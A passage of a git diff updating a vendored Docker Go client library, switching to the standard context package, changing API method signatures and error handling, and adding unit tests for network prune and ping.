(*types.BuildCachePruneReport, error) + BuildCancel(ctx context.Context, id string) error ImageCreate(ctx context.Context, parentReference string, options types.ImageCreateOptions) (io.ReadCloser, error) - ImageHistory(ctx context.Context, image string) ([]types.ImageHistory, error) + ImageHistory(ctx context.Context, image string) ([]image.HistoryResponseItem, error) ImageImport(ctx context.Context, source types.ImageImportSource, ref string, options types.ImageImportOptions) (io.ReadCloser, error) ImageInspectWithRaw(ctx context.Context, image string) (types.ImageInspect, []byte, error) ImageList(ctx context.Context, options types.ImageListOptions) ([]types.ImageSummary, error) ImageLoad(ctx context.Context, input io.Reader, quiet bool) (types.ImageLoadResponse, error) ImagePull(ctx context.Context, ref string, options types.ImagePullOptions) (io.ReadCloser, error) ImagePush(ctx context.Context, ref string, options types.ImagePushOptions) (io.ReadCloser, error) - ImageRemove(ctx context.Context, image string, options types.ImageRemoveOptions) ([]types.ImageDelete, error) + ImageRemove(ctx context.Context, image string, options types.ImageRemoveOptions) ([]types.ImageDeleteResponseItem, error) ImageSearch(ctx context.Context, term string, options types.ImageSearchOptions) ([]registry.SearchResult, error) ImageSave(ctx context.Context, images []string) (io.ReadCloser, error) ImageTag(ctx context.Context, image, ref string) error @@ -87,13 +104,13 @@ type ImageAPIClient interface { // NetworkAPIClient defines API client methods for the networks type NetworkAPIClient interface { - NetworkConnect(ctx context.Context, networkID, container string, config *network.EndpointSettings) error + NetworkConnect(ctx context.Context, network, container string, config *networktypes.EndpointSettings) error NetworkCreate(ctx context.Context, name string, options types.NetworkCreate) (types.NetworkCreateResponse, error) - NetworkDisconnect(ctx context.Context, networkID, container string, force bool) error - NetworkInspect(ctx context.Context, networkID string) (types.NetworkResource, error) - NetworkInspectWithRaw(ctx context.Context, networkID string) (types.NetworkResource, []byte, error) + NetworkDisconnect(ctx context.Context, network, container string, force bool) error + NetworkInspect(ctx context.Context, network string, options types.NetworkInspectOptions) (types.NetworkResource, error) + NetworkInspectWithRaw(ctx context.Context, network string, options types.NetworkInspectOptions) (types.NetworkResource, []byte, error) NetworkList(ctx context.Context, options types.NetworkListOptions) ([]types.NetworkResource, error) - NetworkRemove(ctx context.Context, networkID string) error + NetworkRemove(ctx context.Context, network string) error NetworksPrune(ctx context.Context, pruneFilter filters.Args) (types.NetworksPruneReport, error) } @@ -107,7 +124,7 @@ type NodeAPIClient interface { // PluginAPIClient defines API client methods for the plugins type PluginAPIClient interface { - PluginList(ctx context.Context) (types.PluginsListResponse, error) + PluginList(ctx context.Context, filter filters.Args) (types.PluginsListResponse, error) PluginRemove(ctx context.Context, name string, options types.PluginRemoveOptions) error PluginEnable(ctx context.Context, name string, options types.PluginEnableOptions) error PluginDisable(ctx context.Context, name string, options types.PluginDisableOptions) error @@ -122,11 +139,12 @@ type PluginAPIClient interface { // ServiceAPIClient defines API client methods for the services type ServiceAPIClient interface { ServiceCreate(ctx context.Context, service swarm.ServiceSpec, options types.ServiceCreateOptions) (types.ServiceCreateResponse, error) - ServiceInspectWithRaw(ctx context.Context, serviceID string) (swarm.Service, []byte, error) + ServiceInspectWithRaw(ctx context.Context, serviceID string, options types.ServiceInspectOptions) (swarm.Service, []byte, error) ServiceList(ctx context.Context, options types.ServiceListOptions) ([]swarm.Service, error) ServiceRemove(ctx context.Context, serviceID string) error ServiceUpdate(ctx context.Context, serviceID string, version swarm.Version, service swarm.ServiceSpec, options types.ServiceUpdateOptions) (types.ServiceUpdateResponse, error) ServiceLogs(ctx context.Context, serviceID string, options types.ContainerLogsOptions) (io.ReadCloser, error) + TaskLogs(ctx context.Context, taskID string, options types.ContainerLogsOptions) (io.ReadCloser, error) TaskInspectWithRaw(ctx context.Context, taskID string) (swarm.Task, []byte, error) TaskList(ctx context.Context, options types.TaskListOptions) ([]swarm.Task, error) } @@ -153,10 +171,10 @@ type SystemAPIClient interface { // VolumeAPIClient defines API client methods for the volumes type VolumeAPIClient interface { - VolumeCreate(ctx context.Context, options volumetypes.VolumesCreateBody) (types.Volume, error) + VolumeCreate(ctx context.Context, options volumetypes.VolumeCreateBody) (types.Volume, error) VolumeInspect(ctx context.Context, volumeID string) (types.Volume, error) VolumeInspectWithRaw(ctx context.Context, volumeID string) (types.Volume, []byte, error) - VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumesListOKBody, error) + VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumeListOKBody, error) VolumeRemove(ctx context.Context, volumeID string, force bool) error VolumesPrune(ctx context.Context, pruneFilter filters.Args) (types.VolumesPruneReport, error) } @@ -169,3 +187,12 @@ type SecretAPIClient interface { SecretInspectWithRaw(ctx context.Context, name string) (swarm.Secret, []byte, error) SecretUpdate(ctx context.Context, id string, version swarm.Version, secret swarm.SecretSpec) error } + +// ConfigAPIClient defines API client methods for configs +type ConfigAPIClient interface { + ConfigList(ctx context.Context, options types.ConfigListOptions) ([]swarm.Config, error) + ConfigCreate(ctx context.Context, config swarm.ConfigSpec) (types.ConfigCreateResponse, error) + ConfigRemove(ctx context.Context, id string) error + ConfigInspectWithRaw(ctx context.Context, name string) (swarm.Config, []byte, error) + ConfigUpdate(ctx context.Context, id string, version swarm.Version, config swarm.ConfigSpec) error +} diff --git a/vendor/github.com/docker/docker/client/interface_experimental.go b/vendor/github.com/docker/docker/client/interface_experimental.go index 51da98ecdd..402ffb512c 100644 --- a/vendor/github.com/docker/docker/client/interface_experimental.go +++ b/vendor/github.com/docker/docker/client/interface_experimental.go @@ -1,8 +1,9 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" + "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) type apiClientExperimental interface { diff --git a/vendor/github.com/docker/docker/client/interface_stable.go b/vendor/github.com/docker/docker/client/interface_stable.go index cc90a3cbb9..5502cd7426 100644 --- a/vendor/github.com/docker/docker/client/interface_stable.go +++ b/vendor/github.com/docker/docker/client/interface_stable.go @@ -1,4 +1,4 @@ -package client +package client // import "github.com/docker/docker/client" // APIClient is an interface that clients that talk with a docker server must implement. type APIClient interface { diff --git a/vendor/github.com/docker/docker/client/login.go b/vendor/github.com/docker/docker/client/login.go index 600dc7196f..7d66181900 100644 --- a/vendor/github.com/docker/docker/client/login.go +++ b/vendor/github.com/docker/docker/client/login.go @@ -1,17 +1,17 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/http" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/registry" - "golang.org/x/net/context" ) // RegistryLogin authenticates the docker server with a given docker registry. -// It returns UnauthorizerError when the authentication fails. +// It returns unauthorizedError when the authentication fails. func (cli *Client) RegistryLogin(ctx context.Context, auth types.AuthConfig) (registry.AuthenticateOKBody, error) { resp, err := cli.post(ctx, "/auth", url.Values{}, auth, nil) diff --git a/vendor/github.com/docker/docker/client/network_connect.go b/vendor/github.com/docker/docker/client/network_connect.go index c022c17b5b..5718946134 100644 --- a/vendor/github.com/docker/docker/client/network_connect.go +++ b/vendor/github.com/docker/docker/client/network_connect.go @@ -1,9 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" + "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/network" - "golang.org/x/net/context" ) // NetworkConnect connects a container to an existent network in the docker host. diff --git a/vendor/github.com/docker/docker/client/network_connect_test.go b/vendor/github.com/docker/docker/client/network_connect_test.go index d472f4520c..07a3ba692e 100644 --- a/vendor/github.com/docker/docker/client/network_connect_test.go +++ b/vendor/github.com/docker/docker/client/network_connect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -9,8 +10,6 @@ import ( "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/network" ) @@ -87,6 +86,10 @@ func TestNetworkConnect(t *testing.T) { return nil, fmt.Errorf("expected 'container_id', got %s", connect.Container) } + if connect.EndpointConfig == nil { + return nil, fmt.Errorf("expected connect.EndpointConfig to be not nil, got %v", connect.EndpointConfig) + } + if connect.EndpointConfig.NetworkID != "NetworkID" { return nil, fmt.Errorf("expected 'NetworkID', got %s", connect.EndpointConfig.NetworkID) } diff --git a/vendor/github.com/docker/docker/client/network_create.go b/vendor/github.com/docker/docker/client/network_create.go index 4067a541ff..41da2ac610 100644 --- a/vendor/github.com/docker/docker/client/network_create.go +++ b/vendor/github.com/docker/docker/client/network_create.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // NetworkCreate creates a new network in the docker host. diff --git a/vendor/github.com/docker/docker/client/network_create_test.go b/vendor/github.com/docker/docker/client/network_create_test.go index 0e2457f89c..894c98ebb3 100644 --- a/vendor/github.com/docker/docker/client/network_create_test.go +++ b/vendor/github.com/docker/docker/client/network_create_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestNetworkCreateError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/network_disconnect.go b/vendor/github.com/docker/docker/client/network_disconnect.go index 24b58e3c12..dd15676656 100644 --- a/vendor/github.com/docker/docker/client/network_disconnect.go +++ b/vendor/github.com/docker/docker/client/network_disconnect.go @@ -1,8 +1,9 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" + "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // NetworkDisconnect disconnects a container from an existent network in the docker host. diff --git a/vendor/github.com/docker/docker/client/network_disconnect_test.go b/vendor/github.com/docker/docker/client/network_disconnect_test.go index b54a2b1ccf..b27b955e2e 100644 --- a/vendor/github.com/docker/docker/client/network_disconnect_test.go +++ b/vendor/github.com/docker/docker/client/network_disconnect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestNetworkDisconnectError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/network_inspect.go b/vendor/github.com/docker/docker/client/network_inspect.go index 5ad4ea5bf3..025f6d8757 100644 --- a/vendor/github.com/docker/docker/client/network_inspect.go +++ b/vendor/github.com/docker/docker/client/network_inspect.go @@ -1,30 +1,41 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" + "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // NetworkInspect returns the information for a specific network configured in the docker host. -func (cli *Client) NetworkInspect(ctx context.Context, networkID string) (types.NetworkResource, error) { - networkResource, _, err := cli.NetworkInspectWithRaw(ctx, networkID) +func (cli *Client) NetworkInspect(ctx context.Context, networkID string, options types.NetworkInspectOptions) (types.NetworkResource, error) { + networkResource, _, err := cli.NetworkInspectWithRaw(ctx, networkID, options) return networkResource, err } // NetworkInspectWithRaw returns the information for a specific network configured in the docker host and its raw representation. -func (cli *Client) NetworkInspectWithRaw(ctx context.Context, networkID string) (types.NetworkResource, []byte, error) { - var networkResource types.NetworkResource - resp, err := cli.get(ctx, "/networks/"+networkID, nil, nil) +func (cli *Client) NetworkInspectWithRaw(ctx context.Context, networkID string, options types.NetworkInspectOptions) (types.NetworkResource, []byte, error) { + if networkID == "" { + return types.NetworkResource{}, nil, objectNotFoundError{object: "network", id: networkID} + } + var ( + networkResource types.NetworkResource + resp serverResponse + err error + ) + query := url.Values{} + if options.Verbose { + query.Set("verbose", "true") + } + if options.Scope != "" { + query.Set("scope", options.Scope) + } + resp, err = cli.get(ctx, "/networks/"+networkID, query, nil) if err != nil { - if resp.statusCode == http.StatusNotFound { - return networkResource, nil, networkNotFoundError{networkID} - } - return networkResource, nil, err + return networkResource, nil, wrapResponseError(err, resp, "network", networkID) } defer ensureReaderClosed(resp) diff --git a/vendor/github.com/docker/docker/client/network_inspect_test.go b/vendor/github.com/docker/docker/client/network_inspect_test.go index 1f926d66ba..699bccba67 100644 --- a/vendor/github.com/docker/docker/client/network_inspect_test.go +++ b/vendor/github.com/docker/docker/client/network_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,10 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/network" + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestNetworkInspectError(t *testing.T) { @@ -18,20 +22,29 @@ func TestNetworkInspectError(t *testing.T) { client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } - _, err := client.NetworkInspect(context.Background(), "nothing") - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) - } + _, err := client.NetworkInspect(context.Background(), "nothing", types.NetworkInspectOptions{}) + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) } -func TestNetworkInspectContainerNotFound(t *testing.T) { +func TestNetworkInspectNotFoundError(t *testing.T) { client := &Client{ - client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + client: newMockClient(errorMock(http.StatusNotFound, "missing")), } - _, err := client.NetworkInspect(context.Background(), "unknown") - if err == nil || !IsErrNetworkNotFound(err) { - t.Fatalf("expected a containerNotFound error, got %v", err) + _, err := client.NetworkInspect(context.Background(), "unknown", types.NetworkInspectOptions{}) + assert.Check(t, is.Error(err, "Error: No such network: unknown")) + assert.Check(t, IsErrNotFound(err)) +} + +func TestNetworkInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.NetworkInspectWithRaw(context.Background(), "", types.NetworkInspectOptions{}) + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) } } @@ -46,9 +59,30 @@ func TestNetworkInspect(t *testing.T) { return nil, fmt.Errorf("expected GET method, got %s", req.Method) } - content, err := json.Marshal(types.NetworkResource{ - Name: "mynetwork", - }) + var ( + content []byte + err error + ) + if strings.Contains(req.URL.RawQuery, "scope=global") { + return &http.Response{ + StatusCode: http.StatusNotFound, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + } + + if strings.Contains(req.URL.RawQuery, "verbose=true") { + s := map[string]network.ServiceInfo{ + "web": {}, + } + content, err = json.Marshal(types.NetworkResource{ + Name: "mynetwork", + Services: s, + }) + } else { + content, err = json.Marshal(types.NetworkResource{ + Name: "mynetwork", + }) + } if err != nil { return nil, err } @@ -59,11 +93,26 @@ func TestNetworkInspect(t *testing.T) { }), } - r, err := client.NetworkInspect(context.Background(), "network_id") + r, err := client.NetworkInspect(context.Background(), "network_id", types.NetworkInspectOptions{}) if err != nil { t.Fatal(err) } if r.Name != "mynetwork" { t.Fatalf("expected `mynetwork`, got %s", r.Name) } + + r, err = client.NetworkInspect(context.Background(), "network_id", types.NetworkInspectOptions{Verbose: true}) + if err != nil { + t.Fatal(err) + } + if r.Name != "mynetwork" { + t.Fatalf("expected `mynetwork`, got %s", r.Name) + } + _, ok := r.Services["web"] + if !ok { + t.Fatalf("expected service `web` missing in the verbose output") + } + + _, err = client.NetworkInspect(context.Background(), "network_id", types.NetworkInspectOptions{Scope: "global"}) + assert.Check(t, is.Error(err, "Error: No such network: network_id")) } diff --git a/vendor/github.com/docker/docker/client/network_list.go b/vendor/github.com/docker/docker/client/network_list.go index e566a93e23..f16b2f5624 100644 --- a/vendor/github.com/docker/docker/client/network_list.go +++ b/vendor/github.com/docker/docker/client/network_list.go @@ -1,12 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) // NetworkList returns the list of networks configured in the docker host. diff --git a/vendor/github.com/docker/docker/client/network_list_test.go b/vendor/github.com/docker/docker/client/network_list_test.go index 4d443496ac..5263808cfd 100644 --- a/vendor/github.com/docker/docker/client/network_list_test.go +++ b/vendor/github.com/docker/docker/client/network_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -11,7 +12,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) func TestNetworkListError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/network_prune.go b/vendor/github.com/docker/docker/client/network_prune.go index 7352a7f0c5..6418b8b607 100644 --- a/vendor/github.com/docker/docker/client/network_prune.go +++ b/vendor/github.com/docker/docker/client/network_prune.go @@ -1,12 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) // NetworksPrune requests the daemon to delete unused networks diff --git a/vendor/github.com/docker/docker/client/network_prune_test.go b/vendor/github.com/docker/docker/client/network_prune_test.go new file mode 100644 index 0000000000..7a5d340e51 --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_prune_test.go @@ -0,0 +1,113 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestNetworksPruneError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + } + + filters := filters.NewArgs() + + _, err := client.NetworksPrune(context.Background(), filters) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworksPrune(t *testing.T) { + expectedURL := "/v1.25/networks/prune" + + danglingFilters := filters.NewArgs() + danglingFilters.Add("dangling", "true") + + noDanglingFilters := filters.NewArgs() + noDanglingFilters.Add("dangling", "false") + + labelFilters := filters.NewArgs() + labelFilters.Add("dangling", "true") + labelFilters.Add("label", "label1=foo") + labelFilters.Add("label", "label2!=bar") + + listCases := []struct { + filters filters.Args + expectedQueryParams map[string]string + }{ + { + filters: filters.Args{}, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": "", + }, + }, + { + filters: danglingFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true}}`, + }, + }, + { + filters: noDanglingFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"false":true}}`, + }, + }, + { + filters: labelFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true},"label":{"label1=foo":true,"label2!=bar":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + assert.Check(t, is.Equal(expected, actual)) + } + content, err := json.Marshal(types.NetworksPruneReport{ + NetworksDeleted: []string{"network_id1", "network_id2"}, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + version: "1.25", + } + + report, err := client.NetworksPrune(context.Background(), listCase.filters) + assert.Check(t, err) + assert.Check(t, is.Len(report.NetworksDeleted, 2)) + } +} diff --git a/vendor/github.com/docker/docker/client/network_remove.go b/vendor/github.com/docker/docker/client/network_remove.go index 6bd6748924..12741437be 100644 --- a/vendor/github.com/docker/docker/client/network_remove.go +++ b/vendor/github.com/docker/docker/client/network_remove.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" -import "golang.org/x/net/context" +import "context" // NetworkRemove removes an existent network from the docker host. func (cli *Client) NetworkRemove(ctx context.Context, networkID string) error { resp, err := cli.delete(ctx, "/networks/"+networkID, nil, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "network", networkID) } diff --git a/vendor/github.com/docker/docker/client/network_remove_test.go b/vendor/github.com/docker/docker/client/network_remove_test.go index 2a7b9640c1..ac40af74e6 100644 --- a/vendor/github.com/docker/docker/client/network_remove_test.go +++ b/vendor/github.com/docker/docker/client/network_remove_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestNetworkRemoveError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/node_inspect.go b/vendor/github.com/docker/docker/client/node_inspect.go index abf505d29c..593b2e9f0b 100644 --- a/vendor/github.com/docker/docker/client/node_inspect.go +++ b/vendor/github.com/docker/docker/client/node_inspect.go @@ -1,23 +1,22 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // NodeInspectWithRaw returns the node information. func (cli *Client) NodeInspectWithRaw(ctx context.Context, nodeID string) (swarm.Node, []byte, error) { + if nodeID == "" { + return swarm.Node{}, nil, objectNotFoundError{object: "node", id: nodeID} + } serverResp, err := cli.get(ctx, "/nodes/"+nodeID, nil, nil) if err != nil { - if serverResp.statusCode == http.StatusNotFound { - return swarm.Node{}, nil, nodeNotFoundError{nodeID} - } - return swarm.Node{}, nil, err + return swarm.Node{}, nil, wrapResponseError(err, serverResp, "node", nodeID) } defer ensureReaderClosed(serverResp) diff --git a/vendor/github.com/docker/docker/client/node_inspect_test.go b/vendor/github.com/docker/docker/client/node_inspect_test.go index fc13283084..d0fdace7fe 100644 --- a/vendor/github.com/docker/docker/client/node_inspect_test.go +++ b/vendor/github.com/docker/docker/client/node_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,7 @@ import ( "testing" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func TestNodeInspectError(t *testing.T) { @@ -30,8 +31,20 @@ func TestNodeInspectNodeNotFound(t *testing.T) { } _, _, err := client.NodeInspectWithRaw(context.Background(), "unknown") - if err == nil || !IsErrNodeNotFound(err) { - t.Fatalf("expected an nodeNotFoundError error, got %v", err) + if err == nil || !IsErrNotFound(err) { + t.Fatalf("expected a nodeNotFoundError error, got %v", err) + } +} + +func TestNodeInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.NodeInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) } } diff --git a/vendor/github.com/docker/docker/client/node_list.go b/vendor/github.com/docker/docker/client/node_list.go index 3e8440f08e..9883f6fc52 100644 --- a/vendor/github.com/docker/docker/client/node_list.go +++ b/vendor/github.com/docker/docker/client/node_list.go @@ -1,13 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // NodeList returns the list of nodes. @@ -15,7 +15,7 @@ func (cli *Client) NodeList(ctx context.Context, options types.NodeListOptions) query := url.Values{} if options.Filters.Len() > 0 { - filterJSON, err := filters.ToParam(options.Filters) + filterJSON, err := filters.ToJSON(options.Filters) if err != nil { return nil, err diff --git a/vendor/github.com/docker/docker/client/node_list_test.go b/vendor/github.com/docker/docker/client/node_list_test.go index 0251b5cce4..784a754a59 100644 --- a/vendor/github.com/docker/docker/client/node_list_test.go +++ b/vendor/github.com/docker/docker/client/node_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -12,7 +13,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) func TestNodeListError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/node_remove.go b/vendor/github.com/docker/docker/client/node_remove.go index 0a77f3d578..e7a7505715 100644 --- a/vendor/github.com/docker/docker/client/node_remove.go +++ b/vendor/github.com/docker/docker/client/node_remove.go @@ -1,11 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - - "golang.org/x/net/context" ) // NodeRemove removes a Node. @@ -17,5 +16,5 @@ func (cli *Client) NodeRemove(ctx context.Context, nodeID string, options types. resp, err := cli.delete(ctx, "/nodes/"+nodeID, query, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "node", nodeID) } diff --git a/vendor/github.com/docker/docker/client/node_remove_test.go b/vendor/github.com/docker/docker/client/node_remove_test.go index f2f8adc4a3..85f828b849 100644 --- a/vendor/github.com/docker/docker/client/node_remove_test.go +++ b/vendor/github.com/docker/docker/client/node_remove_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,8 +10,6 @@ import ( "testing" "github.com/docker/docker/api/types" - - "golang.org/x/net/context" ) func TestNodeRemoveError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/node_update.go b/vendor/github.com/docker/docker/client/node_update.go index 3ca9760282..de32a617fb 100644 --- a/vendor/github.com/docker/docker/client/node_update.go +++ b/vendor/github.com/docker/docker/client/node_update.go @@ -1,11 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "strconv" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // NodeUpdate updates a Node. diff --git a/vendor/github.com/docker/docker/client/node_update_test.go b/vendor/github.com/docker/docker/client/node_update_test.go index 613ff104eb..d89e1ed858 100644 --- a/vendor/github.com/docker/docker/client/node_update_test.go +++ b/vendor/github.com/docker/docker/client/node_update_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types/swarm" ) diff --git a/vendor/github.com/docker/docker/client/ping.go b/vendor/github.com/docker/docker/client/ping.go index 22dcda24fd..85d38adb51 100644 --- a/vendor/github.com/docker/docker/client/ping.go +++ b/vendor/github.com/docker/docker/client/ping.go @@ -1,16 +1,16 @@ -package client +package client // import "github.com/docker/docker/client" import ( - "fmt" + "context" + "path" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) -// Ping pings the server and return the value of the "Docker-Experimental" & "API-Version" headers +// Ping pings the server and returns the value of the "Docker-Experimental", "OS-Type" & "API-Version" headers func (cli *Client) Ping(ctx context.Context) (types.Ping, error) { var ping types.Ping - req, err := cli.buildRequest("GET", fmt.Sprintf("%s/_ping", cli.basePath), nil, nil) + req, err := cli.buildRequest("GET", path.Join(cli.basePath, "/_ping"), nil, nil) if err != nil { return ping, err } @@ -20,11 +20,13 @@ func (cli *Client) Ping(ctx context.Context) (types.Ping, error) { } defer ensureReaderClosed(serverResp) - ping.APIVersion = serverResp.header.Get("API-Version") + if serverResp.header != nil { + ping.APIVersion = serverResp.header.Get("API-Version") - if serverResp.header.Get("Docker-Experimental") == "true" { - ping.Experimental = true + if serverResp.header.Get("Docker-Experimental") == "true" { + ping.Experimental = true + } + ping.OSType = serverResp.header.Get("OSType") } - - return ping, nil + return ping, cli.checkResponseErr(serverResp) } diff --git a/vendor/github.com/docker/docker/client/ping_test.go b/vendor/github.com/docker/docker/client/ping_test.go new file mode 100644 index 0000000000..10bbbe811d --- /dev/null +++ b/vendor/github.com/docker/docker/client/ping_test.go @@ -0,0 +1,83 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "errors" + "io/ioutil" + "net/http" + "strings" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +// TestPingFail tests that when a server sends a non-successful response that we +// can still grab API details, when set. +// Some of this is just exercising the code paths to make sure there are no +// panics. +func TestPingFail(t *testing.T) { + var withHeader bool + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + resp := &http.Response{StatusCode: http.StatusInternalServerError} + if withHeader { + resp.Header = http.Header{} + resp.Header.Set("API-Version", "awesome") + resp.Header.Set("Docker-Experimental", "true") + } + resp.Body = ioutil.NopCloser(strings.NewReader("some error with the server")) + return resp, nil + }), + } + + ping, err := client.Ping(context.Background()) + assert.Check(t, is.ErrorContains(err, "")) + assert.Check(t, is.Equal(false, ping.Experimental)) + assert.Check(t, is.Equal("", ping.APIVersion)) + + withHeader = true + ping2, err := client.Ping(context.Background()) + assert.Check(t, is.ErrorContains(err, "")) + assert.Check(t, is.Equal(true, ping2.Experimental)) + assert.Check(t, is.Equal("awesome", ping2.APIVersion)) +} + +// TestPingWithError tests the case where there is a protocol error in the ping. +// This test is mostly just testing that there are no panics in this code path. +func TestPingWithError(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + resp := &http.Response{StatusCode: http.StatusInternalServerError} + resp.Header = http.Header{} + resp.Header.Set("API-Version", "awesome") + resp.Header.Set("Docker-Experimental", "true") + resp.Body = ioutil.NopCloser(strings.NewReader("some error with the server")) + return resp, errors.New("some error") + }), + } + + ping, err := client.Ping(context.Background()) + 